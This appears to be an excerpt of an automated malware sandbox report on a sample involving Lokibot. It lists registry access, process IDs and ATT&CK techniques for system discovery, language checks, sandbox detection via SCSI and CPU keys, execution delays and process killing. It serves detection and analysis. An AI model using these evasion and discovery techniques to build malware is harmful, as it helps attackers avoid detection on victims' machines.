Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

ink.exeicacls.exeattrib.exenet1.exeicacls.exeattrib.exesc.exesc.execmd.exenetsh.execmd.exeicacls.exesc.exeicacls.exewinlog.exenet1.exeicacls.exetaskhost.execmd.execmd.exeicacls.exeicacls.exereg.exenet.execmd.exeLokibot.exesc.exeR8.execmd.exeicacls.exetimeout.exesc.exeicacls.exeicacls.exenet1.exeicacls.exetimeout.execmd.execmd.execmd.exenet1.execmd.execmd.execmd.execmd.exechcp.comschtasks.exeicacls.exeicacls.exeicacls.execmd.execmd.execmd.execmd.execmd.exeicacls.exeicacls.exeicacls.exetaskkill.exenetsh.execmd.exenet.exeSetup.exetimeout.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ink.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winlog.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lokibot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	R8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

taskmgr.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

winit.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Delays execution with timeout.exe 7 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

3524 timeout.exe
3628 timeout.exe
5564 timeout.exe
5088 timeout.exe
5396 timeout.exe
1960 timeout.exe
4340 timeout.exe

pid	process
3524	timeout.exe
3628	timeout.exe
5564	timeout.exe
5088	timeout.exe
5396	timeout.exe
1960	timeout.exe
4340	timeout.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

Processes:

NW_store.exemsedge.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	NW_store.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	NW_store.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	NW_store.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

3524 ipconfig.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5664 taskkill.exe
5400 taskkill.exe
5444 taskkill.exe
4560 taskkill.exe
4376 taskkill.exe

pid	process
3524	ipconfig.exe

pid	process
5664	taskkill.exe
5400	taskkill.exe
5444	taskkill.exe
4560	taskkill.exe
4376	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

chrome.exeNW_store.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133696992343682985"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	NW_store.exe

Modifies registry class 64 IoCs

Processes:

chrome.exewini.exeR8.exewinit.exemsedge.exemsedge.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "3"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	R8.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe1000000007393172d7e4da0152d462cfe1e4da012748dc66b5fcda0114000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-656926755-4116854191-210765258-1000\{5061634D-AE73-43F0-B411-BB43BE36A26A}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	chrome.exe
